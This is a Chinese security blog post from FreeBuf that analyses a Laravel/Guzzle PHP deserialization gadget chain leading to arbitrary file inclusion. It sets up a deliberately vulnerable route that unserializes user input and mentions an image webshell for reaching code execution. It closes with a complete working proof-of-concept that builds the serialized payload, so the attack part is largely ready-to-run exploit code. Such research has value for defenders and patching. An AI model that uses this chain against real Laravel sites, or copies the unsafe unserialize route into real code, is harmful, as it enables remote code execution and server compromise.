最新Laravel反序列化文件包含

2023-02-15 13:05:10

所属地 四川省

![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

情人节实在是太无聊了，翻了半天Laravel框架的代码，搞了一条没回显的任意文件包含反序列化链出来。

##### 1.反序列化调用链分析

入口就是CVE-2022-30779的起点，也就是`GuzzleHttp\Cookie\FileCookieJar#__destruct()`：  
![image.png](https://image.3001.net/images/20230214/1676377202_63eb7c7282ebd4bcfa95b.png)  
调用`GuzzleHttp\Cookie\FileCookieJar#save()`方法时是将`$this->filename`当做string传入的，`$this->filename`可控，所以这里是可以调用任意类的\_\_toString()方法的。我找到的可以利用的\_\_toString()方法是`Illuminate\View\View#__toString()`:  
![image.png](https://image.3001.net/images/20230214/1676377596_63eb7dfc3f5a923c9dca0.png)  
调用了render()方法，跟进看一下：  
![image.png](https://image.3001.net/images/20230214/1676377651_63eb7e339ee0be6bf4cbe.png)  
调用了renderContents()方法，继续跟：  
![image.png](https://image.3001.net/images/20230214/1676377694_63eb7e5e2d98dfdb828be.png)  
跟进这个getContents()方法：  
![image.png](https://image.3001.net/images/20230214/1676377738_63eb7e8af2403ca9c8ff2.png)  
这里的`$this->engine`可控，所以可以调用任意类的get()方法了，我找到的可以利用的是`Illuminate\View\Engines\PhpEngine#get()`:  
![image.png](https://image.3001.net/images/20230214/1676377832_63eb7ee83abe5ccd97557.png)  
它这里调用了evaluatePath()方法，跟进看一下，这里调用了ob\_start()函数，所以这是个没有输出的文件包含了，只能在有上传功能的时候实现rce：  
![image.png](https://image.3001.net/images/20230214/1676377880_63eb7f184c9e2e8fdd8bc.png)  
`$this->files`可控，可以调用任意类的getRequire()方法。找到的是`Illuminate\Filesystem\Filesystem#getRequire()`：  
![image.png](https://image.3001.net/images/20230214/1676378031_63eb7faf22d9b13945e21.png)  
执行到`return require $__path;`则实现了文件包含。  
验证一手，github下载个最新的Laravel，composer install安装。然后在routes\\web.php添加个路由：

    use Illuminate\Support\Facades\Route;
    
    /*
    |--------------------------------------------------------------------------
    | Web Routes
    |--------------------------------------------------------------------------
    |
    | Here is where you can register web routes for your application. These
    | routes are loaded by the RouteServiceProvider within a group which
    | contains the "web" middleware group. Now create something great!
    |
    */
    
    //Route::get('/', function () {
    //    return view('welcome');
    //});
    
    Route::get('/', function (\Illuminate\Http\Request $request) {
    
        $str = base64_decode($request->input("str"));
        unserialize($str);
        return "test";
    });
    

生成一个图片马：  
![image.png](https://image.3001.net/images/20230214/1676378326_63eb80d6b264c3a54124f.png)  
反序列化文件包含：  
![image.png](https://image.3001.net/images/20230214/1676378410_63eb812a062d40fa76400.png)  
![image.png](https://image.3001.net/images/20230214/1676378430_63eb813e6a9b93cd3cd6c.png)  
最终poc：

    namespace GuzzleHttp\Cookie{
    
        use Illuminate\View\FileViewFinder;
        use Illuminate\View\View;
        use Illuminate\View\Factory;
        use Illuminate\View\Engines\PhpEngine;
        use Illuminate\View\Engines\EngineResolver;
        use Illuminate\Filesystem\Filesystem;
    
        class CookieJar{
            private $cookies = [];
            function __construct() {
                $this->cookies[] = [];
            }
        }
    
        class FileCookieJar extends CookieJar {
            private $filename;
            function __construct() {
                parent::__construct();
                $this->filename = new View(new Factory(new EngineResolver(),new FileViewFinder(new Filesystem(),["./"])),new PhpEngine(new Filesystem()),1,"./info.php",["index"]);
            }
        }
    }
    namespace Illuminate\View{
    
        use Illuminate\Events\Dispatcher;
        use Illuminate\Filesystem\Filesystem;
        use Illuminate\View\Engines\EngineResolver;
        use Illuminate\View\Engines\PhpEngine;
    
    
        class FileViewFinder implements ViewFinderInterface{
            public function __construct(Filesystem $files, array $paths, array $extensions = null){}
        }
        interface ViewFinderInterface{}
        class Factory{
            protected $shared = [];
            public function __construct(EngineResolver $engines, ViewFinderInterface $finder)
            {
                $this->shared = [];
                $this->finder = $finder;
                $this->events = new Dispatcher();
                $this->engines = $engines;
            }
        }
        class View{
            protected $data;
            public function __construct(Factory $factory, PhpEngine $engine, $view, $path, $data = [])
            {
                $this->view = $view;
                $this->path = "file"; 
                $this->engine = $engine;
                $this->factory = $factory;
                $this->data = [];
            }
        }
    }
    namespace Illuminate\View\Engines{
    
        use Illuminate\Filesystem\Filesystem;
    
        class PhpEngine{
            protected $files;
            public function __construct(Filesystem $files)
            {
                $this->files = $files;
            }
        }
    }
    namespace Illuminate\Filesystem{
        class Filesystem{
    
        }
    }
    namespace Illuminate\View\Engines{
        class EngineResolver{
    
        }
    }
    namespace Illuminate\Events{
    
        use Illuminate\Contracts\Events\Dispatcher as DispatcherContract;
    
        class Dispatcher implements DispatcherContract{
    
        }
    
    }
    namespace Illuminate\Contracts\Events{
        interface Dispatcher{};
    }
    
    
    namespace{
    
        use GuzzleHttp\Cookie\FileCookieJar;
    
        $pop = new FileCookieJar();
        echo urlencode(base64_encode(serialize($pop)));
    }
    

\# web安全